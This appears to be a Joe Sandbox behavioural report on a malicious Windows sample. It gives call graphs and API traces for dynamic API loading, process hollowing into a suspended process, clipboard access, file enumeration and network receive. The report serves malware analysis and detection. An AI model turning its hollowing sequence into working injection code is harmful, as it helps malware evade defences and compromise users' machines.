53195 4392de 38 API calls 3 library calls 53179->53195 53182 43b05d 53194 43a827 26 API calls _Deallocate 53182->53194 53183 43b088 53196 43b7b6 20 API calls 2 library calls 53183->53196 53186 433d2c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53187 41363c 53186->53187 53187->52568 53188 43b100 53197 43be24 50 API calls 3 library calls 53188->53197 53191 43b10b 53198 43b820 20 API calls _free 53191->53198 53192 43b068 53192->53186 53193->53182 53194->53192 53195->53183 53196->53188 53197->53191 53198->53192 53200 404592 recv 53199->53200 53201 404565 WaitForSingleObject 53199->53201 53203 4045a5 53200->53203 53218 420556 56 API calls 53201->53218 53203->53120 53204 404581 SetEvent 53204->53203 53206 4046a3 53205->53206 53207 4047d8 53206->53207 53210 403b60 28 API calls 53206->53210 53211 401eef 26 API calls 53206->53211 53212 401eea 26 API calls 53206->53212 53213 401ebd 28 API calls 53206->53213 53214 401fbd 28 API calls 53206->53214 53217 402654 26 API calls 53206->53217 53219 411b60 53206->53219 53208 401eea 26 API calls 53207->53208 53209 4047e1 53208->53209 53209->53120 53210->53206 53211->53206 53212->53206 53215 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 53213->53215 53214->53206 53215->53206 53523 414b9b 53215->53523 53217->53206 53218->53204 53220 411b72 53219->53220 53221 403b60 28 API calls 53220->53221 53222 411b85 53221->53222 53223 401fbd 28 API calls 53222->53223 53224 411b94 53223->53224 53225 401fbd 28 API calls 53224->53225 53226 411ba3 53225->53226 53227 41afc3 28 API calls 53226->53227 53228 411bac 53227->53228 53229 411c60 53228->53229 53231 401d64 28 API calls 53228->53231 53230 401d8c 26 API calls 53229->53230 53232 411c69 53230->53232 53233 411bc8 53231->53233 53234 401eea 26 API calls 53232->53234 53235 401fbd 28 API calls 53233->53235 53237 411c72 53234->53237 53236 411bd0 53235->53236 53238 401d64 28 API calls 53236->53238 53239 401eea 26 API calls 53237->53239 53240 411be0 53238->53240 53241 411c7a 53239->53241 53242 401fbd 28 API calls 53240->53242 53241->53206 53243 411be8 53242->53243 53244 401d64 28 API calls 53243->53244 53245 411bf8 53244->53245 53246 401fbd 28 API calls 53245->53246 53247 411c00 53246->53247 53248 401d64 28 API calls 53247->53248 53249 411c10 53248->53249 53250 401fbd 28 API calls 53249->53250 53251 411c18 53250->53251 53252 401d64 28 API calls 53251->53252 53253 411c28 53252->53253 53254 401fbd 28 API calls 53253->53254 53255 411c30 53254->53255 53256 401d64 28 API calls 53255->53256 53257 411c43 53256->53257 53258 401fbd 28 API calls 53257->53258 53259 411c4b 53258->53259 53263 411c81 GetModuleFileNameW 53259->53263 53262 4047eb 98 API calls 53262->53229 53281 411cac 53263->53281 53264 40c854 32 API calls 53264->53281 53265 401eea 26 API calls 53265->53281 53266 41ab38 42 API calls 53266->53281 53267 403b40 28 API calls 53267->53281 53268 403cbb 28 API calls 53268->53281 53269 403cdc 28 API calls 53269->53281 53270 411dea Sleep 53270->53281 53271 4028cf 28 API calls 53271->53281 53272 4176b6 31 API calls 53272->53281 53273 411e8c Sleep 53273->53281 53274 401e13 26 API calls 53274->53281 53275 411f2e Sleep 53275->53281 53276 411f90 DeleteFileW 53276->53281 53277 41b61a 32 API calls 53277->53281 53278 411fc7 DeleteFileW 53278->53281 53279 412019 Sleep 53279->53281 53280 412003 DeleteFileW 53280->53281 53281->53264 53281->53265 53281->53266 53281->53267 53281->53268 53281->53269 53281->53270 53281->53271 53281->53272 53281->53273 53281->53274 53281->53275 53281->53276 53281->53277 53281->53278 53281->53279 53281->53280 53282 412092 53281->53282 53289 41205e Sleep 53281->53289 53283 401e13 26 API calls 53282->53283 53284 41209e 53283->53284 53285 401e13 26 API calls 53284->53285 53286 4120aa 53285->53286 53287 401e13 26 API calls 53286->53287 53288 4120b6 53287->53288 53290 40b027 28 API calls 53288->53290 53291 401e13 26 API calls 53289->53291 53292 4120c9 53290->53292 53296 41206e 53291->53296 53293 401fbd 28 API calls 53292->53293 53295 4120e9 53293->53295 53294 401e13 26 API calls 53294->53296 53405 4123f7 53295->53405 53296->53281 53296->53294 53298 412090 53296->53298 53298->53288 53300 401e13 26 API calls 53301 412100 53300->53301 53302 412125 53301->53302 53303 412274 53301->53303 53417 41aec8 53302->53417 53304 41aec8 28 API calls 53303->53304 53306 41227d 53304->53306 53309 4027ec 28 API calls 53306->53309 53308 41ad46 28 API calls 53311 412146 53308->53311 53310 4122b2 53309->53310 53312 4027cb 28 API calls 53310->53312 53313 4027ec 28 API calls 53311->53313 53314 4122c1 53312->53314 53315 412176 53313->53315 53316 4027cb 28 API calls 53314->53316 53317 4027cb 28 API calls 53315->53317 53318 4122cd 53316->53318 53319 412185 53317->53319 53320 4027cb 28 API calls 53318->53320 53321 4027cb 28 API calls 53319->53321 53322 4122dc 53320->53322 53323 412194 53321->53323 53324 4027cb 28 API calls 53322->53324 53325 4027cb 28 API calls 53323->53325 53326 4122eb 53324->53326 53327 4121a3 53325->53327 53328 4027cb 28 API calls 53326->53328 53329 4027cb 28 API calls 53327->53329 53330 4122fa 53328->53330 53331 4121b2 53329->53331 53332 4027cb 28 API calls 53330->53332 53333 4027cb 28 API calls 53331->53333 53334 412309 53332->53334 53335 4121be 53333->53335 53336 40275c 28 API calls 53334->53336 53337 4027cb 28 API calls 53335->53337 53338 412313 53336->53338 53339 4121ca 53337->53339 53341 404468 60 API calls 53338->53341 53421 40275c 53339->53421 53342 412320 53341->53342 53344 401eea 26 API calls 53342->53344 53343 4121d9 53345 4027cb 28 API calls 53343->53345 53346 41232c 53344->53346 53347 4121e5 53345->53347 53348 401eea 26 API calls 53346->53348 53349 40275c 28 API calls 53347->53349 53350 412338 53348->53350 53351 4121ef 53349->53351 53352 401eea 26 API calls 53350->53352 53353 404468 60 API calls 53351->53353 53354 412344 53352->53354 53355 4121fc 53353->53355 53356 401eea 26 API calls 53354->53356 53357 401eea 26 API calls 53355->53357 53358 412350 53356->53358 53359 412205 53357->53359 53360 401eea 26 API calls 53358->53360 53361 401eea 26 API calls 53359->53361 53362 412359 53360->53362 53363 41220e 53361->53363 53364 401eea 26 API calls 53362->53364 53365 401eea 26 API calls 53363->53365 53366 412362 53364->53366 53367 412217 53365->53367 53368 401eea 26 API calls 53366->53368 53369 401eea 26 API calls 53367->53369 53370 412268 53368->53370 53371 412220 53369->53371 53373 401eea 26 API calls 53370->53373 53372 401eea 26 API calls 53371->53372 53374 41222c 53372->53374 53375 412374 53373->53375 53376 401eea 26 API calls 53374->53376 53377 401e13 26 API calls 53375->53377 53378 412238 53376->53378 53379 412380 53377->53379 53380 401eea 26 API calls 53378->53380 53381 401eea 26 API calls 53379->53381 53382 412244 53380->53382 53383 41238c 53381->53383 53384 401eea 26 API calls 53382->53384 53385 401eea 26 API calls 53383->53385 53386 412250 53384->53386 53387 412398 53385->53387 53388 401eea 26 API calls 53386->53388 53389 401eea 26 API calls 53387->53389 53390 41225c 53388->53390 53391 4123a4 53389->53391 53392 401eea 26 API calls 53390->53392 53393 401eea 26 API calls 53391->53393 53392->53370 53394 4123b0 53393->53394 53395 401eea 26 API calls 53394->53395 53396 4123bc 53395->53396 53397 401eea 26 API calls 53396->53397 53398 4123c8 53397->53398 53399 401eea 26 API calls 53398->53399 53400 4123d4 53399->53400 53401 401eea 26 API calls 53400->53401 53402 4123e0 53401->53402 53403 401eea 26 API calls 53402->53403 53404 411c50 53403->53404 53404->53262 53406 412435 53405->53406 53408 412406 53405->53408 53407 412444 53406->53407 53431 10001c5b 53406->53431 53409 403b40 28 API calls 53407->53409 53428 410b0d 53408->53428 53411 412450 53409->53411 53413 401eea 26 API calls 53411->53413 53414 4120f4 53413->53414 53414->53300 53418 41aed5 53417->53418 53419 401f86 28 API calls 53418->53419 53420 412131 53419->53420 53420->53308 53425 40276b 53421->53425 53422 4027ad 53423 401e9b 28 API calls 53422->53423 53424 4027ab 53423->53424 53424->53343 53425->53422 53426 4027a2 53425->53426 53522 402ee5 28 API calls 53426->53522 53436 410b19 53428->53436 53432 10001c6b ___scrt_fastfail 53431->53432 53483 100012ee 53432->53483 53434 10001c87 53434->53407 53435 410d8d 28 API calls ___crtLCMapStringA 53435->53406 53467 4105b9 53436->53467 53438 410b38 53440 4105b9 SetLastError 53438->53440 53453 410c1f SetLastError 53438->53453 53464 410b15 53438->53464 53442 410b5f 53440->53442 53441 410bbf GetNativeSystemInfo 53443 410bd6 53441->53443 53442->53441 53442->53442 53442->53453 53442->53464 53443->53453 53470 410abe VirtualAlloc 53443->53470 53445 410bfe 53446 410c26 GetProcessHeap HeapAlloc 53445->53446 53480 410abe VirtualAlloc 53445->53480 53448 410c3d 53446->53448 53449 410c4f 53446->53449 53481 410ad5 VirtualFree 53448->53481 53451 4105b9 SetLastError 53449->53451 53454 410c98 53451->53454 53452 410c16 53452->53446 53452->53453 53453->53464 53455 410d45 53454->53455 53471 410abe VirtualAlloc 53454->53471 53482 410eb0 GetProcessHeap HeapFree 53455->53482 53458 410cb1 ctype 53472 4105cc SetLastError ctype ___scrt_fastfail 53458->53472 53460 410cdd 53460->53455 53473 410975 SetLastError SetLastError 53460->53473 53462 410d04 53462->53455 53474 410769 53462->53474 53464->53435 53465 410d0f 53465->53455 53465->53464 53466 410d3a SetLastError 53465->53466 53466->53455 53468 4105c8 53467->53468 53469 4105bd SetLastError 53467->53469 53468->53438 53469->53438 53470->53445 53471->53458 53472->53460 53473->53462 53475 410790 53474->53475 53477 410891 53475->53477 53478 4106d3 VirtualProtect 53475->53478 53479 41087f 53475->53479 53476 4106d3 VirtualProtect 53476->53477 53477->53465 53478->53475 53479->53476 53480->53452 53481->53453 53482->53464 53484 10001324 ___scrt_fastfail 53483->53484 53485 100013b7 GetEnvironmentVariableW 53484->53485 53509 100010f1 53485->53509 53488 100010f1 57 API calls 53489 10001465 53488->53489 53490 100010f1 57 API calls 53489->53490 53491 10001479 53490->53491 53492 100010f1 57 API calls 53491->53492 53493 1000148d 53492->53493 53494 100010f1 57 API calls 53493->53494 53495 100014a1 53494->53495 53496 100010f1 57 API calls 53495->53496 53497 100014b5 lstrlenW 53496->53497 53498 100014d9 lstrlenW 53497->53498 53508 100014d2 53497->53508 53499 100010f1 57 API calls 53498->53499 53500 10001501 lstrlenW lstrcatW 53499->53500 53501 100010f1 57 API calls 53500->53501 53502 10001539 lstrlenW lstrcatW 53501->53502 53503 100010f1 57 API calls 53502->53503 53504 1000156b lstrlenW lstrcatW 53503->53504 53505 100010f1 57 API calls 53504->53505 53506 1000159d lstrlenW lstrcatW 53505->53506 53507 100010f1 57 API calls 53506->53507 53507->53508 53508->53434 53510 10001118 ___scrt_fastfail 53509->53510 53511 10001129 lstrlenW 53510->53511 53512 10002c40 ___scrt_fastfail 53511->53512 53513 10001148 lstrcatW lstrlenW 53512->53513 53514 10001177 lstrlenW FindFirstFileW 53513->53514 53515 10001168 lstrlenW 53513->53515 53516 100011a0 53514->53516 53517 100011e1 53514->53517 53515->53514 53518 100011c7 FindNextFileW 53516->53518 53519 100011aa 53516->53519 53517->53488 53518->53516 53521 100011da FindClose 53518->53521 53519->53518 53520 10001000 49 API calls 53519->53520 53520->53519 53521->53517 53522->53424 53524 401fbd 28 API calls 53523->53524 53525 414bbd SetEvent 53524->53525 53526 414bd2 53525->53526 53527 403b60 28 API calls 53526->53527 53528 414bec 53527->53528 53529 401fbd 28 API calls 53528->53529 53530 414bfc 53529->53530 53531 401fbd 28 API calls 53530->53531 53532 414c0e 53531->53532 53533 41afc3 28 API calls 53532->53533 53534 414c17 53533->53534 53536 414d99 53534->53536 53537 414c37 GetTickCount 53534->53537 53601 414d8a 53534->53601 53535 401d8c 26 API calls 53538 4161fb 53535->53538 53599 414dad 53536->53599 53536->53601 53539 41ad46 28 API calls 53537->53539 53540 401eea 26 API calls 53538->53540 53541 414c4d 53539->53541 53543 416207 53540->53543 53602 41aca0 GetLastInputInfo GetTickCount 53541->53602 53545 401eea 26 API calls 53543->53545 53547 416213 53545->53547 53546 414c54 53548 41ad46 28 API calls 53546->53548 53549 414c5f 53548->53549 53550 41ac52 30 API calls 53549->53550 53551 414c6d 53550->53551 53552 41aec8 28 API calls 53551->53552 53553 414c7b 53552->53553 53554 401d64 28 API calls 53553->53554 53555 414c89 53554->53555 53556 4027ec 28 API calls 53555->53556 53557 414c97 53556->53557 53558 40275c 28 API calls 53557->53558 53559 414ca6 53558->53559 53560 4027cb 28 API calls 53559->53560 53561 414cb5 53560->53561 53562 40275c 28 API calls 53561->53562 53563 414cc4 53562->53563 53564 4027cb 28 API calls 53563->53564 53565 414cd0 53564->53565 53566 40275c 28 API calls 53565->53566 53567 414cda 53566->53567 53568 404468 60 API calls 53567->53568 53569 414ce9 53568->53569 53570 401eea 26 API calls 53569->53570 53571 414cf2 53570->53571 53572 401eea 26 API calls 53571->53572 53573 414cfe 53572->53573 53574 401eea 26 API calls 53573->53574 53575 414d0a 53574->53575 53576 401eea 26 API calls 53575->53576 53577 414d16 53576->53577 53578 401eea 26 API calls 53577->53578 53579 414d22 53578->53579 53580 401eea 26 API calls 53579->53580 53581 414d2e 53580->53581 53582 401e13 26 API calls 53581->53582 53583 414d3a 53582->53583 53584 401eea 26 API calls 53583->53584 53585 414d43 53584->53585 53586 401eea 26 API calls 53585->53586 53587 414d4c 53586->53587 53588 401d64 28 API calls 53587->53588 53589 414d57 53588->53589 53590 43a5e7 42 API calls 53589->53590 53591 414d64 53590->53591 53592 414d69 53591->53592 53593 414d8f 53591->53593 53595 414d82 53592->53595 53596 414d77 53592->53596 53594 401d64 28 API calls 53593->53594 53594->53536 53598 404915 104 API calls 53595->53598 53603 4049ba 81 API calls 53596->53603 53598->53601 53604 404ab1 83 API calls 53599->53604 53600 414d7d 53600->53601 53601->53535 53602->53546 53603->53600 53604->53600 53605->53143 53606->53148 53607->53150 53610 40cc3f 53609->53610 53611 403b9e 28 API calls 53610->53611 53612 40ca3a 53611->53612 53613 402860 53612->53613 53615 40286f 53613->53615 53614 4028b1 53622 402daf 53614->53622 53615->53614 53618 4028a6 53615->53618 53617 4028af 53617->52620 53621 402d68 28 API calls 53618->53621 53620->52601 53621->53617 53623 402dbb 53622->53623 53624 4030f7 28 API calls 53623->53624 53625 402dcd 53624->53625 53625->53617 53628 40e56a 53626->53628 53627 4124b7 3 API calls 53627->53628 53628->53627 53629 40e60e 53628->53629 53631 40e5fe Sleep 53628->53631 53639 40e59c 53628->53639 53632 4082dc 28 API calls 53629->53632 53630 4082dc 28 API calls 53630->53639 53631->53628 53635 40e619 53632->53635 53634 41ae08 28 API calls 53634->53639 53636 41ae08 28 API calls 53635->53636 53637 40e625 53636->53637 53661 412774 29 API calls 53637->53661 53639->53630 53639->53631 53639->53634 53641 401e13 26 API calls 53639->53641 53644 401f66 28 API calls 53639->53644 53648 4126d2 29 API calls 53639->53648 53659 40bf04 73 API calls ___scrt_fastfail 53639->53659 53660 412774 29 API calls 53639->53660 53641->53639 53642 40e638 53643 401e13 26 API calls 53642->53643 53645 40e644 53643->53645 53644->53639 53646 401f66 28 API calls 53645->53646 53647 40e655 53646->53647 53649 4126d2 29 API calls 53647->53649 53648->53639 53650 40e668 53649->53650 53662 411699 TerminateProcess WaitForSingleObject 53650->53662 53652 40e670 ExitProcess 53663 411637 61 API calls 53658->53663 53660->53639 53661->53642 53662->53652 53664 41569e 53665 401d64 28 API calls 53664->53665 53666 4156b3 53665->53666 53667 401fbd 28 API calls 53666->53667 53668 4156bb 53667->53668 53669 401d64 28 API calls 53668->53669 53670 4156cb 53669->53670 53671 401fbd 28 API calls 53670->53671 53672 4156d3 53671->53672 53675 411aed 53672->53675 53676 4041f1 3 API calls 53675->53676 53677 411b01 53676->53677 53678 40428c 96 API calls 53677->53678 53679 411b09 53678->53679 53680 4027ec 28 API calls 53679->53680 53681 411b22 53680->53681 53682 4027cb 28 API calls 53681->53682 53683 411b2c 53682->53683 53684 404468 60 API calls 53683->53684 53685 411b36 53684->53685 53686 401eea 26 API calls 53685->53686 53687 411b3e 53686->53687 53688 4045d5 260 API calls 53687->53688 53689 411b4c 53688->53689 53690 401eea 26 API calls 53689->53690 53691 411b54 53690->53691 53692 401eea 26 API calls 53691->53692 53693 411b5c 53692->53693

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                    • API String ID: 384173800-625181639
                                                                                                                                                                                    • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                    • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 447 417245-417262 448 417266-4172d9 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 447->448 449 4175cd 448->449 450 4172df-4172e6 448->450 451 4175cf-4175d9 449->451 450->449 452 4172ec-4172f3 450->452 452->449 453 4172f9-4172fb 452->453 453->449 454 417301-41732d call 436050 * 2 453->454 454->449 459 417333-41733e 454->459 459->449 460 417344-417374 CreateProcessW 459->460 461 4175c7 GetLastError 460->461 462 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 460->462 461->449 463 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->463 464 4173a8-4173c8 ReadProcessMemory 462->464 463->449 464->463 465 4173ce-4173ee NtCreateSection 464->465 465->463 466 4173f4-417401 465->466 467 417403-41740e NtUnmapViewOfSection 466->467 468 417414-417436 NtMapViewOfSection 466->468 467->468 469 417477-41749e GetCurrentProcess NtMapViewOfSection 468->469 470 417438-417466 VirtualFree NtClose TerminateProcess 468->470 471 417591 469->471 472 4174a4-4174a6 469->472 470->449 473 41746c-417472 470->473 471->463 474 4174a8-4174ac 472->474 475 4174af-4174d6 call 435ad0 472->475 473->448 474->475 478 417516-417520 475->478 479 4174d8-4174e2 475->479 481 417522-417528 478->481 482 41753e-417542 478->482 480 4174e6-417509 call 435ad0 479->480 492 41750b-417512 480->492 481->482 486 41752a-41753b call 417651 481->486 483 417544-417560 WriteProcessMemory 482->483 484 417566-41757d Wow64SetThreadContext 482->484 483->463 487 417562 483->487 484->463 488 41757f-41758b ResumeThread 484->488 486->482 487->484 488->463 491 41758d-41758f 488->491 491->451 492->478
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                                                    • NtClose.NTDLL(?), ref: 0041744A
                                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                                                                                                                    • NtClose.NTDLL(?), ref: 004175B6
                                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                    • API String ID: 3150337530-3035715614
                                                                                                                                                                                    • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                                                                    • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                                                                                                    • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                                                                    • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                    • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00415A7A
